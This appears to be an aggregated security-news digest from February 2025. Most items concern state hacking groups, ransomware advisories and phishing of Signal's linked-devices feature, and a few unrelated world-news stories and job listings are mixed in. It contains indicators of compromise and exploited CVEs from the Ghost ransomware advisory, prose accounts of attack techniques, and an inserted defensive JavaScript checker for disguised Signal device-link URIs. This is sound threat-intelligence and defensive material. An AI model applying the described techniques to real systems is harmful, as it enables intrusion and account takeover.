    The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers. [...]

    Autosummary: These attacks have targeted well-known manufacturers, including Fortinet, Barracuda, SonicWall, Check Point, D-Link, Cisco, Juniper, NetGear, and Sophos.


    Cybersecurity jobs available right now in the USA: February 20, 2025

    ciber
    2025-02-20 https://www.helpnetsecurity.com/2025/02/20/cybersecurity-jobs-available-right-now-in-the-usa-february-20-2025/

    Compliance & Privacy Specialist McKesson | Remote – View job details As a Compliance & Privacy Specialist, you will identify potential gaps, establish and maintain policies and procedures to guide the business in complying with regulatory requirements, create and deliver workforce education on privacy and data protection standards, establish and enhance auditing and monitoring activities along with corresponding metrics, and investigate potential policy and regulatory infractions within the business. Cybersecurity Analyst Messer | On-site – …

    Autosummary: Security Engineer II, Stores Application Security Amazon | On-site – View job details As a Security Engineer II, Stores Application Security, you will be responsible for creating, updating, and maintaining threat models for various software projects, conducting manual and automated secure code reviews (primarily in Java, Python, and JavaScript), developing security automation tools, and performing adversarial security analysis using cutting-edge tools. Intern – Cybersecurity Analyst KPI Solutions | On-site – View job details As an Intern – Cybersecurity Analyst, you will conduct real-time 24/7 security monitoring and intrusion detection analysis for all KPI networks, servers, cloud platforms, and endpoint (laptop, desktop, mobile, and internet of things/IOT) systems. Cyber Security Engineer, Compliance – SOX Community Health Systems | Remote – View job details As a Cyber Security Engineer, Compliance – SOX, you will coordinate periodic access reviews for key SOX systems and applications, including running reports in multiple systems, analyzing data, and investigating exceptions for potential risk exposure.


    NailaoLocker ransomware targets EU healthcare-related entities

    exploits ransomware
    2025-02-20 https://securityaffairs.com/174440/malware/nailaolocker-ransomware-targets-eu-healthcare-related-entities.html
    NailaoLocker ransomware is a new threat that targeted European healthcare organizations from June to October 2024. Orange Cyberdefense CERT uncovered a malware campaign, tracked as the Green Nailao campaign, that targeted European organizations, including healthcare, in late 2024, using ShadowPad, PlugX, and the previously undocumented NailaoLocker ransomware. The Orange Cyberdefense CERT investigated four attackers with […]

    Autosummary: By Pierluigi Paganini, February 20, 2025. Orange Cyberdefense CERT uncovered a malware campaign, tracked as the Green Nailao campaign, that targeted European organizations, including healthcare, in late 2024, using ShadowPad, PlugX, and the previously undocumented NailaoLocker ransomware.


    Black Basta ransomware gang’s internal chat logs leak online

    exploits ransomware
    2025-02-20 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-s-internal-chat-logs-leak-online/
    An unknown leaker has released what they claim to be an archive of internal Matrix chat logs belonging to the Black Basta ransomware operation. [...]

    Autosummary: Some of their victims include German defense contractor Rheinmetall, Hyundai’s European division, BT Group (formerly British Telecom), U.S. healthcare giant Ascension, government contractor ABB, the American Dental Association, U.K. tech outsourcing firm Capita, the Toronto Public Library, and Yellow Pages Canada.


    Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers

    exploits Telcos
    2025-02-20 https://securityaffairs.com/174460/apt/salt-typhoon-custom-malware-jumbledpath-to-spy-u-s-telecom-providers.html
    China-linked cyber espionage group Salt Typhoon uses custom malware JumbledPath to spy on U.S. telecom providers. Cisco Talos researchers reported that China-linked APT group Salt Typhoon uses a custom-built utility, dubbed JumbledPath, to spy on network traffic of U.S. telecommunication providers. China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) has been active since at least 2019 and […]

    Autosummary: By Pierluigi Paganini, February 20, 2025. Cisco reported that Salt Typhoon used stolen credentials, captured network configs, and intercepted SNMP, TACACS, and RADIUS traffic to gather more credentials for further access. The China-linked APT group is still targeting telecommunications providers worldwide, and according to a report recently published by Recorded Future’s Insikt Group, the threat actors have breached more U.S. telecommunications providers by exploiting unpatched Cisco IOS XE network devices.


    Kunai: Open-source threat hunting tool for Linux

    Linux
    2025-02-19 https://www.helpnetsecurity.com/2025/02/19/kunai-open-source-threat-hunting-tool-for-linux/

    Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. “What sets Kunai apart is its ability to go beyond simple event generation. While most security monitoring tools rely on syscalls or kernel function hooking, Kunai takes a more advanced approach by correlating events on the host and providing enriched insights. This means fewer but more meaningful events, reducing noise and the strain on log ingestion while delivering deeper visibility …

    Autosummary: Plus, it seamlessly integrates with other open-source tools, supporting YARA rules for file scanning and connecting to MISP for real-time IoC scanning: ensuring security teams have the flexibility and power they need,” Jerome explained.


    VC-backed cybersecurity startups and the exit crunch

    ciber
    2025-02-19 https://www.helpnetsecurity.com/2025/02/19/venture-backed-cybersecurity-startups-video/

    The cybersecurity startup landscape is at a crossroads. As venture-backed companies strive for successful exits, the bar has risen dramatically, requiring more funding, higher revenue, and faster growth than ever before. In this Help Net Security video, Mark Kraynak, Founding Partner at Acrew Capital, breaks down the Exit Escape Velocity for Cybersecurity Startups report to explore the challenges of IPOs and M&A deals in the post-COVID era.

    The post VC-backed cybersecurity startups and the exit crunch appeared first on Help Net Security.

    "

    Autosummary: "


    CISA Adds Palo Alto Networks and SonicWall Flaws to Exploited Vulnerabilities List

    exploits
    2025-02-19 https://thehackernews.com/2025/02/cisa-adds-palo-alto-networks-and.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting Palo Alto Networks PAN-OS and SonicWall SonicOS SSLVPN to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The flaws are listed below - CVE-2025-0108 (CVSS score: 7.8) - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS "

    Autosummary: "


    U.S. CISA adds SonicWall SonicOS and Palo Alto PAN-OS flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-19 https://securityaffairs.com/174375/security/u-s-cisa-adds-sonicwall-sonicos-and-palo-alto-pan-os-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SonicWall SonicOS and Palo Alto Networks PAN-OS vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are CVE-2025-0108 (Palo Alto PAN-OS Authentication Bypass Vulnerability) and CVE-2024-53704 (SonicWall SonicOS SSLVPN Improper Authentication Vulnerability). Researchers recently warned that threat actors […] "

    Autosummary: The two vulnerabilities are: CVE-2025-0108, Palo Alto PAN-OS Authentication Bypass Vulnerability; CVE-2024-53704, SonicWall SonicOS SSLVPN Improper Authentication Vulnerability. Researchers recently warned that threat actors exploit a recently disclosed vulnerability, CVE-2025-0108, in Palo Alto Networks PAN-OS firewalls. (Pierluigi Paganini, February 19, 2025) "


    Brazil"s former President Jair Bolsonaro charged over alleged coup plot

    latam
    2025-02-19 https://www.bbc.com/news/articles/cwydxnxnxpgo
    The former Brazilian president has been charged with attempting a coup after his 2022 election loss. "

    Autosummary: "Allied with other individuals, including civilians and military personnel, they attempted to prevent, in a coordinated manner, the result of the 2022 presidential elections from being fulfilled," he said. "


    Trojanized Game Installers Deploy Cryptocurrency Miner in Large-Scale StaryDobry Attack

    exploits
    2025-02-19 https://thehackernews.com/2025/02/trojanized-game-installers-deploy.html
    Users who are on the lookout for popular games were lured into downloading trojanized installers that led to the deployment of a cryptocurrency miner on compromised Windows hosts. The large-scale activity has been codenamed StaryDobry by Russian cybersecurity company Kaspersky, which first detected it on December 31, 2024. It lasted for a month. Targets of the campaign include individuals and "

    Autosummary: The blob, like in the previous step, is written to disk under the name "Unix.Directory.IconHandler.dll" in the folder %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. The newly created DLL is configured to retrieve the final-stage binary from a remote server that's responsible for running the miner implant, while also continuously checking for taskmgr.exe and procmon.exe in the list of running processes. "


    Q3 2024 – a brief overview of the main incidents in industrial cybersecurity

    industry ciber
    2025-02-19 https://ics-cert.kaspersky.com/publications/q3-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
    Many large companies, including some well-known brands, were affected by cyberattacks. An unusually high number of victims were in critical sectors such as utilities and power and energy. "

    Autosummary: The group claimed to have access to 1 TB of organizational data, including corporate data, financial data, NDAs, confidential data, HR data, hiring data, R&D data, engineering data, personal employee documents and information, and customer data. The review concluded on July 9, by which time it was determined that some of the affected files contained personal information, including full name, Social Security number, and possibly one or more of the following: passport number, driver’s license number, tax ID, financial account number, payment card number, medical information, and/or insurance information. While the information involved varied depending on the individual, the type of information that may have been exposed includes: name, Social Security number, address, date of birth, email address, driver’s license number, financial account information, as well as tax, medical, and health insurance information.

    Innophos Holdings Inc. hit by cyberattack | Manufacturing, chemicals | Denial of operations, personal data leakage
    Innophos Holdings Inc., a US manufacturer of chemicals for the food, health, nutrition, and industrial markets, reported to the attorney general of Maine in August that it had experienced a data breach that may have compromised sensitive personal information in its systems.

    Netherland, Sewell & Associates, Inc. hit by ransomware | Energy | Denial of IT systems, personal data leakage | Ransomware
    Netherland, Sewell & Associates, Inc., a US upstream engineering provider specializing in the oil and gas industry, suffered a ransomware attack that disrupted the company’s network in July and filed a breach notification document with the attorney general of Maine in September.

    Kulicke and Soffa Industries, Inc. hit by ransomware | Manufacturing, electronics | Denial of operations, personal data leakage | Ransomware
    Kulicke and Soffa Industries, Inc. (K&S), a US manufacturer of semiconductors and electronic assembly solutions, reported to the attorney general of Maine and submitted an 8-K filing that it experienced a data breach in which the sensitive personal information in its systems may have been accessed and acquired. On September 16, K&S completed this review and discovered that the potentially exposed records included the names, identification numbers, bank account numbers, and/or bank routing numbers of current and/or former employees as well as their dependents and other individuals associated with K&S. Upon discovering the incident, K&S reset passwords for all employee accounts, suspended mobile email access for employees, identified and removed malicious files, and significantly enhanced its monitoring, logging, and detection capabilities.

    Microchip Technology hit by ransomware | Manufacturing, electronics | Denial of IT systems, denial of operations and services, data leakage, personal data leakage | Ransomware
    US chip manufacturer Microchip Technology Incorporated detected suspicious activity in its information systems on August 17, according to an SEC 8-K filing. They claimed to have stolen a wide range of information from Microchip Technology’s compromised systems, including private and personal confidential data, customer documents, as well as budget, payroll, accounting, contract, tax, ID and financial information. While the affected information varied depending on the individual, the type of information potentially exposed includes: name, Social Security number, date of birth, contact details, government ID and/or passport number, financial information, and medical information.

    Port of Seattle hit by ransomware | Transportation, logistics | Denial of IT systems, denial of services, data leakage | Ransomware
    The Port of Seattle (USA), which operates the port and Seattle-Tacoma International Airport, announced via social media on August 24 that it had experienced certain system outages that indicated a possible cyberattack. The port took steps to block further activity, including disconnecting its systems from the internet, but the encryption and response measures affected some services, including baggage, check-in kiosks, ticketing, Wi-Fi, passenger display boards, the port’s website, the flySEA app, and reserved parking.

    The types of personal data affected included a combination of name, address, NRIC/FIN number, date of birth, photograph, work permit number, bank account details, telephone number and passport number.

    Elyria Foundry Holdings LLC hit by ransomware | Manufacturing | Personal data leakage | Ransomware
    Elyria Foundry Holdings LLC, a US manufacturer of iron castings for various industries, including automotive, engineering, and other commercial uses, detected suspicious activity on its computer network on June 25 and filed a breach notification document with the attorney general of Maine in September.

    Hanon Systems USA, LLC hit by ransomware | Manufacturing, automotive | Personal data leakage | Ransomware
    US thermal management solutions manufacturer Hanon Systems USA, LLC was the victim of a ransomware event on July 21 that saw certain information accessed by a third-party actor and held under the threat of ransom, according to a breach notification document filed with the Maine attorney general in September.

    After detecting the incident with its security tools, the company immediately initiated its standard response protocols to contain, assess and remediate the incident, including beginning an investigation with outside experts, activating its incident response plan, notifying federal law enforcement authorities, and taking certain systems offline out of an abundance of caution. The company said the personal information stolen by the attackers varied depending on the victim’s relationship with the company and may have included: name, date of birth, Social Security number, address, salary information, W-2s, and tax return documents. While the affected information varies depending on the individual, the type of information potentially exposed includes: name, Social Security number, driver’s license number, state or federal identification number, financial account information, and health insurance information. The following types of personal information were stored on the compromised systems: full name, date of birth, driver’s license number, Social Security number, bank account number and routing number, and other personnel-related information, including medical questionnaires.

    Kantsu hit by ransomware | Transportation, logistics | Denial of services, denial of operations, personal data leakage | Ransomware
    Japanese logistics and transportation company Kantsu was the victim of a ransomware attack on September 12, resulting in the detection of an infection on some of its servers and the shutdown of its networks to prevent further attacks.

    JAS Worldwide hit by ransomware | Transportation, logistics | Denial of IT services, denial of operations | Ransomware
    JAS Worldwide, a global freight company headquartered in the USA, confirmed on August 27 that it had been the victim of a ransomware cyberattack that had disrupted its operations and customer services.

    S&F Concrete Contractors, Corp. hit by ransomware | Construction, engineering | Personal data leakage | Ransomware
    US construction company S&F Concrete Contractors, Corp. notified the attorneys general of Vermont and Maine it had experienced a data breach that may have compromised the sensitive personal identifiable information and protected health information in its systems.

    Oldenburg Group hit by ransomware | Manufacturing | Personal data leakage | Ransomware
    Oldenburg Group and its Visa Lighting division, a US-based supplier of heavy equipment and architectural lighting products, reported to the attorneys general of Maine and Vermont that it experienced a cyberattack between May 4 and May 5, in which an attacker believed to be associated with the Play ransomware group installed ransomware on the company’s primary servers and may have accessed personal information stored on the servers.

    V.H. Blackinton & Company hit by cyberattack | Manufacturing | Personal data leakage
    V.H. Blackinton & Company, Inc., a US manufacturer of public safety badges and uniform insignias, discovered unusual activity in its digital environment on August 30, according to a report submitted to the attorneys general of Maine and Vermont in September.

    CRB Engineering hit by ransomware | Construction, engineering | Denial of IT systems, personal data leakage | Ransomware
    US engineering, construction and consulting firm CRB Engineering notified the New Hampshire attorney general that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems.

    Noritsu America Corporation hit by ransomware | Manufacturing | Personal data leakage | Ransomware
    Noritsu America Corporation, a US manufacturer of high-end professional digital imaging equipment and a subsidiary of the Japanese holding company Noritsu, was the victim of a cyberattack that exfiltrated personal information, according to a data breach notification submitted in August.

    Anderson Feazel Management, Inc. hit by cyberattack | Energy | Personal data leakage
    US energy company Anderson Feazel Management, Inc., which specializes in oil and gas production, suffered an attack on its computer system on or around July 31. Upon detecting the unauthorized activity, the company immediately began taking steps to contain, assess and remediate the incident, including launching an investigation, activating its incident response plan, and shutting down some systems.

    Basement Systems hit by ransomware | Construction, engineering | Denial of IT systems, personal data leakage | Ransomware
    US construction company Basement Systems notified the attorneys general of Maine and Vermont that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems.

    Granit Design hit by ransomware | Manufacturing | Personal data leakage | Ransomware
    Granit Design, a Canadian manufacturer of natural stone, quartz and ultra-compact surfaces, notified the attorneys general of Maine and Vermont in September that it had experienced a cybersecurity incident affecting the confidentiality of its employee data.

    Blue Ridge Rural Water Company Inc. hit by cyberattack | Water supply, energy, utility | Personal data leakage
    US-based Blue Ridge Rural Water Company Inc. suffered a cyberattack on its corporate network, which was a separate system from its water management network. "


    Russian phishing campaigns exploit Signal"s device-linking feature

    financial exploits rusia-ucrania
    2025-02-19 https://www.bleepingcomputer.com/news/security/russian-phishing-campaigns-exploit-signals-device-linking-feature/
    Russian threat actors have been launching phishing campaigns that exploit the legitimate "Linked Devices" feature in the Signal messaging app to gain unauthorized access to accounts of interest. [...] "

    Autosummary: “In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite” - Google Threat Intelligence Group The fake invitations had the legitimate redirect JavaScript code replaced with a malicious block that included Signal’s URI (Uniform Resource Identifier) for linking a new device (“sgnl://linkdevice uuid”) instead of the one for joining the group (“sgnl://signal.group/”). "
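    The URI swap described above, as an added example that is not code from the article, from Google Threat Intelligence Group, or from Signal: a check that pulls the deep links out of an invite page and classifies each one, so a device-link request dressed up as a group invite is flagged before anyone scans it. The link shapes it assumes (a group invite under the signal.group host with its token in the fragment; a device-link request under sgnl://linkdevice with uuid and pub_key query parameters) are assumptions for illustration, not stated on the page, and the page text in the usage is constructed.

```javascript
// Added example, not code from the article, from Google TIG, or from Signal.
// Classifies the deep link an invite page would hand to the Signal app so a
// link-device request dressed up as a group invite can be flagged.
//
// Assumed link shapes (not stated on the page, used for illustration only):
//   group invite:  sgnl://signal.group/#<token>  or  https://signal.group/#<token>
//   device link:   sgnl://linkdevice?uuid=<id>&pub_key=<key>

const GROUP_HOST = "signal.group";
const LINK_DEVICE_HOST = "linkdevice";

function classifySignalLink(raw) {
  let url;
  try {
    url = new URL(String(raw).trim());
  } catch (err) {
    return { kind: "invalid", reason: "not a parseable URI" };
  }
  // sgnl: is a non-special scheme, so the WHATWG URL parser keeps the host's case as-is.
  const scheme = url.protocol.replace(/:$/, "").toLowerCase();
  const host = url.hostname.toLowerCase();

  if (scheme === "sgnl" && host === LINK_DEVICE_HOST) {
    // The URI a real "Linked Devices" QR code carries. On an invite page it is
    // exactly the substitution the phishing kit made.
    return {
      kind: "link-device",
      reason: "link would enroll a new device, not join a group",
      deviceUuid: url.searchParams.get("uuid"),
    };
  }
  if ((scheme === "sgnl" || scheme === "https") && host === GROUP_HOST) {
    // Invite tokens ride in the fragment; a group link without one is odd.
    return url.hash.length > 1
      ? { kind: "group-invite", reason: "join-group link" }
      : { kind: "suspicious", reason: "group host without an invite token" };
  }
  return { kind: "suspicious", reason: `unexpected target ${scheme}://${host}` };
}

// Collects every sgnl:// or signal.group link from fetched page text, including
// ones buried in inline JavaScript, which is where the swapped URI lived.
function extractSignalLinks(pageText) {
  const linkRe = /(?:sgnl:\/\/|https:\/\/signal\.group\/)[^\s"'<>)]+/gi;
  return Array.from(new Set(pageText.match(linkRe) || []));
}

function auditInvitePage(pageText) {
  return extractSignalLinks(pageText).map((link) => ({ link, ...classifySignalLink(link) }));
}

// Constructed page text standing in for a fetched invite page (not a real sample).
const SAMPLE_PAGE =
  "<script>const href = 'sgnl://linkdevice?uuid=11111111-2222-3333-4444-555555555555&pub_key=QUJDREVG';" +
  " window.location = href;</script>";

for (const finding of auditInvitePage(SAMPLE_PAGE)) {
  console.log(`${finding.kind.padEnd(13)} ${finding.reason}  <- ${finding.link}`);
}
```

The check is deliberately scheme-and-host based rather than a string match on "linkdevice": the host of a non-special scheme is not case-normalised by the parser, so the comparison lowercases it, and a group link that carries no fragment token is reported rather than trusted.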


    Malwarebytes introduces native ARM support for Windows devices

    exploits
    2025-02-19 https://www.malwarebytes.com/blog/personal/2025/02/malwarebytes-introduces-native-arm-support-for-windows-devices
    Malwarebytes now protects ARM-based Windows devices, such as Microsoft’s Surface Pro X and Lenovo’s Yoga laptops. "

    Autosummary: "


    OpenSSH bugs allow Man-in-the-Middle and DoS Attacks

    exploits
    2025-02-19 https://securityaffairs.com/174384/security/openssh-vulnerabilities-mitm-dos.html
    Two OpenSSH vulnerabilities could allow machine-in-the-middle (MitM) and denial-of-service (DoS) attacks under certain conditions. The Qualys Threat Research Unit (TRU) has discovered two vulnerabilities in OpenSSH. The first, tracked as CVE-2025-26465 (CVSS score: 6.8), can be exploited by an attacker to conduct an active machine-in-the-middle attack on the OpenSSH client when the VerifyHostKeyDNS option is enabled. The […] "

    Autosummary: OpenSSH bugs allow Man-in-the-Middle and DoS Attacks (Pierluigi Paganini, February 19, 2025). Two OpenSSH vulnerabilities could allow machine-in-the-middle (MitM) and denial-of-service (DoS) attacks under certain conditions. "


    British journalist Charlotte Peet reported missing in Brazil

    latam
    2025-02-19 https://www.bbc.com/news/articles/c4gexj8ll31o
    The Association of Foreign Press Correspondents in Brazil says it is concerned over her disappearance. "

    Autosummary: "


    Palo Alto Networks tags new firewall bug as exploited in attacks

    exploits
    2025-02-19 https://www.bleepingcomputer.com/news/security/palo-alto-networks-tags-new-firewall-bug-as-exploited-in-attacks/
    Palo Alto Networks warns that hackers are actively exploiting a critical authentication bypass flaw (CVE-2025-0108) in PAN-OS firewalls, chaining it with two other vulnerabilities to breach devices in active attacks. [...] "

    Autosummary: "Palo Alto Networks has observed exploit attempts chaining CVE-2025-0108 with CVE-2024-9474 and CVE-2025-0111 on unpatched and unsecured PAN-OS web management interfaces," reads the updated bulletin. "


    The Browser Blind Spot: Why Your Browser is the Next Cybersecurity Battleground

    ciber
    2025-02-19 https://www.bleepingcomputer.com/news/security/the-browser-blind-spot-why-your-browser-is-the-next-cybersecurity-battleground/
    For years, defensive security strategies have focused on three core areas: network, endpoint, and email. Meanwhile, the browser sits across all of them. This article examines three key areas where attackers focus their efforts and how browser-based attacks are evolving. [...] "

    Autosummary: Just as EDR transformed endpoint security, Browser Detection & Response (BDR) must become a core component of enterprise security, enabling real-time telemetry, JavaScript execution analysis, and browser-layer threat intelligence integration into security operations. By operating within the browser’s execution environment, these threats evade traditional detection mechanisms, allowing cybercriminals to hijack user sessions, deliver drive-by downloads, steal credentials, and compromise sensitive data. [Figure: Threat trail for web-based mail phishing attack in Keep Aware] Organizations must adopt a browser-native threat detection model, monitoring session behaviors, credential input patterns, and high-risk interactions in real time. "


    #StopRansomware: Ghost (Cring) Ransomware

    exploits ransomware
    2025-02-19 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a

    Summary

    Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

    The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.

    Beginning in early 2021, Ghost actors began attacking victims whose internet-facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

    Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.ex "

    Autosummary: Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.

    Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, commonly referred to as the ProxyShell attack chain). Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

    Impact and Encryption: Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network.

    Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx

    Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity (file name: MD5 file hash)
    Cring.exe: c5d712f82d5d37bb284acd4468ab3533
    Ghost.exe: 34b3009590ec2d361f07cac320671410, d9c019182d88290e5489cdf3b607f982
    ElysiumO.exe: 29e44e8994197bdb0c2be6fc5dfc15c2, c9e35b5c1dc8856da25965b385a26ec4, d1c5e7b8e937625891707f8b4b594314
    Locker.exe: ef6a213f59f3fbee2894bd6734bbaed2
    iex.txt, pro.txt (IOX): ac58a214ce7deb3a578c10b97f93d9c3
    x86.log (IOX): c3b8f6d102393b4542e9f951c9435255, 0a5c4ad3ec240fbfd00bdc1d36bd54eb
    sp.txt (IOX): ff52fdf84448277b1bc121f592f753c5
    main.txt (IOX): a2fd181f57548c215ac6891d000ec6b9
    isx.txt (IOX): 625bd7275e1892eac50a22f8b4a6355d
    sock.txt (IOX): db38ef2e3d4d8cb785df48f458b35090

    Ransom Email Addresses: Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes.

    Validate Security Controls: In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.

    Reporting: The FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). "


    Hackers Exploit Signal"s Linked Devices Feature to Hijack Accounts via Malicious QR Codes

    exploits
    2025-02-19 https://thehackernews.com/2025/02/hackers-exploit-signals-linked-devices.html
    Multiple Russia-aligned threat actors have been observed targeting individuals of interest via the privacy-focused messaging app Signal to gain unauthorized access to their accounts. "The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple "

    Autosummary: "The executables delivered through fake download pages follow a consistent execution pattern involving temporary file extraction, process injection, security modifications, and network communications," Hunt.io said, adding the samples exhibit infostealer-like functionality associated with a malware strain referred to as MicroClip. "


    Seven Chileans charged over burglary spree targeting US sportsmen

    latam
    2025-02-19 https://www.bbc.com/news/articles/c07ze242rj5o
    Goods worth more than $2m were stolen from the homes of NBA and NFL players late last year. "

    Autosummary: The complaint names the men as Pablo Zuniga Cartes, Ignacio Zuniga Cartes, Bastian Jimenez Freraut, Jordan Quiroga Sanchez, Bastian Orellano Morales, Alexander Huiaguil Chavez, and Sergio Ortega Cabello. "


    "Help us": Hundreds deported from US held in Panama hotel

    latam
    2025-02-19 https://www.bbc.com/news/articles/c3rndygqll7o
    Indians, Afghans and Sri Lankans are among the undocumented migrants unable to leave the hotel after being deported. "

    Autosummary: Hundreds deported from US held in Panama hotel (Cecilia Barría, Santiago Vanegas and Ángel Bermúdez, BBC News Mundo). [Image, Getty Images: Two people who have been deported from the US ask for help from the window of the Decápolis Hotel in Panama City] In a room at the luxury Decápolis Hotel in Panama City, two girls hold a piece of paper to the window with a written message. [Image, Getty Images: Migrants in the Decápolis Hotel try to catch the attention of those outside] However, of the 299 undocumented migrants - from India, China, Uzbekistan, Iran, Vietnam, Turkey, Nepal, Pakistan, Afghanistan and Sri Lanka - only 171 have agreed to return to their countries of origin. [Image: A photo taken by one of the deported migrants from inside the hotel where they remain isolated in Panama City] Using a hidden mobile phone, since contact with those outside of the Decápolis Hotel is reportedly not allowed, the Iranian woman said the migrant told her there were several children in the hotel, that they have been denied a lawyer and that they are not allowed to leave their rooms even to eat. "


    CISA and FBI: Ghost ransomware breached orgs in 70 countries

    exploits ransomware
    2025-02-19 https://www.bleepingcomputer.com/news/security/cisa-and-fbi-ghost-ransomware-breached-orgs-in-70-countries/
    CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. [...] "

    Autosummary: "


    Phishing attack hides JavaScript using invisible Unicode trick

    financial
    2025-02-19 https://www.bleepingcomputer.com/news/security/phishing-attack-hides-javascript-using-invisible-unicode-trick/
    A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC). [...] "

    Autosummary: "


    Cybersecurity jobs available right now: February 18, 2025

    ciber
    2025-02-18 https://www.helpnetsecurity.com/2025/02/18/cybersecurity-jobs-available-right-now-february-18-2025/

    Airport Cybersecurity Engineer II Salt Lake City Corporation | USA | On-site – View job details As an Airport Cybersecurity Engineer II, you will develop and implement policies, procedures, and training plans for security and network administration. Assess and mitigate cybersecurity threats. Manage incident response and recovery plans. Application Security Architect WalkMe | Israel | Hybrid – View job details As an Application Security Architect, you will conduct design and code reviews to ensure secure … More

    The post Cybersecurity jobs available right now: February 18, 2025 appeared first on Help Net Security.

    "

    Autosummary: Security Engineer Clover Health | Canada | Remote – View job details As a Security Engineer, you will implement, operationalize and monitor security applications such as EDR, DLP, SAST, vulnerability management, and CSPM systems. Security Architect, AI, Automation IBM | Ireland | Hybrid – View job details As a Security Architect, AI, Automation, you will collaborate with SecDevOps teams to integrate security into CI/CD pipelines, ensuring compliance with regulatory standards like FedRAMP and NIST. Cyber Security Engineer ALTEN | Belgium | Hybrid – View job details As a Cyber Security Engineer, you will analyze system and network requirements, and design secure architectures from scratch, ensuring network hardening and the application of best security practices. Network Security Engineer Al Etihad Payments | UAE | On-site – View job details As a Network Security Engineer, you will be responsible for designing, implementing, and maintaining AEP’s network and security infrastructure. "


    Cybercriminals Exploit Onerror Event in Image Tags to Deploy Payment Skimmers

    exploits ciber
    2025-02-18 https://thehackernews.com/2025/02/cybercriminals-exploit-onerror-event-in.html
    Cybersecurity researchers have flagged a credit card stealing malware campaign that has been observed targeting e-commerce sites running Magento by disguising the malicious content within image tags in HTML code in order to stay under the radar. MageCart is the name given to malware that's capable of stealing sensitive payment information from online shopping sites. The attacks are known to "

